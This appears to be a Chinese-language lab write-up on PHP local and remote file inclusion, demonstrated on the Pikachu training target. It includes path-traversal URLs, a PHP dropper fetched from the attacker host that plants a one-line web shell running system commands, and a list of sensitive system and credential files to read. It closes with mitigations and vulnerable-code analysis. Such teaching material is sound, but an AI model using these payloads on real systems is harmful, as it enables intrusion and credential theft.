1.什么是文件包含漏洞？这个网站漏洞的原理是啥？

文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。

1.本地文件包含漏洞：仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。

2.远程文件包含漏洞：能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。
因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。
你可以通过“File Inclusion”对应的测试栏目，来进一步的了解该漏洞。

拓扑图：

2.为什么会产生这个漏洞被黑客攻击？最直接的原因是啥？

1. 配置问题
2. 使用PHP高危函数，不做校验或判断
   3.

文件包含漏洞包含函数

3.怎么发现这个漏洞？怎么去验证漏洞是否存在？怎么利用这个漏洞？

根据实验环境演示：

本地文件包含

1. 任意选择一个喜欢的明星 发现filename=file1.php

猜想：修改file1.php——>>file2.php那么就会出现另一个明星的信息。(意料之内)

2.filename=file1.php修改为 ../../../../../boot.ini将boot信息包含出来。

http://192.168.0.108/pikachu/vul/fileinclude/fi_local.php?filename=../../../../../boot.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

远程文件包含

代码由黑客控制，可写入一句话木马，进行包含。

实验环境：

攻击机：192.168.0.106

靶机：192.168.0.108

1. 通过观察url传参发现所包含文件的相对路径

http://192.168.0.108/pikachu/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

2.构造一句话木马：

<?php

$myfile = fopen ("shell.php" , "c");
$txt = '<?php system($_GET[x]) ;?>';
fwrite($myfile,$txt);
fclose($myfile);

?>

攻击机开启WEB服务，新建一个txt写入以上代码；并可以在局域网/公网访问。

我这里为了方便用的是局域网，在渗透的过程中需要把shell.txt放到公网。

http://192.168.0.106/shell.txt

1. 将Url中的filename=后面的相对路径改为攻击机上的shell连接http://192.168.0.106/shell.txt

这样：

192.168.0.108/pikachu/vul/fileinclude/fi_remote.php?filename=http://192.168.0.106/shell.txt&submit=提交查询

最后访问靶机url 会在靶机上生成一个shell.php的一句话木马。

1. 如何判断木马放在那个目录并访问木马？？

• 扫目录
• 一般木马都在同级目录192.168.0.108/pikachu/vul/fileinclude/ 下

最后：

访问 http://192.168.0.108/pikachu/vul/fileinclude/shell.php 和木马建立连接。

执行系统命令：

#  http://192.168.0.108/pikachu/vul/fileinclude/shell.php?x=系统命令http://192.168.0.108/pikachu/vul/fileinclude/shell.php?x=whoami

查看系统信息

①包含一些敏感的配置文件

windows常见的敏感文件路径:

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件

Linux常见的敏感文件路径:

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数

../上一层目录

./当前目录

/顶级目录

../../../跨目录读取

192.168.0.108/pikachu/vul/fileinclude/fi_local.php?filename=../../../../../../../../../boot.ini&submit=提交查询

利用方式

4.漏洞利用的首要条件是啥？漏洞危害的范围？漏洞导致的危害有多大？

php.ini配置如下

allow_url_fopen = on //默认打开
Allow_url_include = on //默认关闭

1. Web服务器文件被外界浏览导致信息泄露。
2. 脚本被任意执行所造成的影响：

典型案例：

篡改网站
执行非法操作
攻击其他网站

5.如果在甲方公司出现漏洞问题，公司站点受到此攻击，我应该如何快速定位到问题进行修复防止被入侵？

修复方式：

过滤../ ./
配置php.ini文件
都关闭allow_url_fopen 和 allow_url_include
设置白名单

6.如何提前防范这个漏洞？如何做好加固？

0.在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作。

1.过滤各种../../,http:// , https://

2.配置php.ini配置文件:
allow_ url fopen = off
Allow_ url_ include= off
magic_ quotes _gpc=on //gpc

3.通过白名单策略,仅允许包含运行指定的文件,其他的都禁止;

7.代码分析

本地文件包含

if(isset($_GET['submit']) && $_GET['filename']!=null){
    $filename=$_GET['filename'];
    include "include/$filename";//变量传进来直接包含,没做任何的安全限制
//     //安全的写法,使用白名单，严格指定包含的文件名
//     if($filename=='file1.php' || $filename=='file2.php' || $filename=='file3.php' || $filename=='file4.php' || $filename=='file5.php'){
//         include "include/$filename";

//     }

远程文件包含

$html='';
if(isset($_GET['submit']) && $_GET['filename']!=null){
    $filename=$_GET['filename'];
    include "$filename";//变量传进来直接包含,没做任何的安全限制
}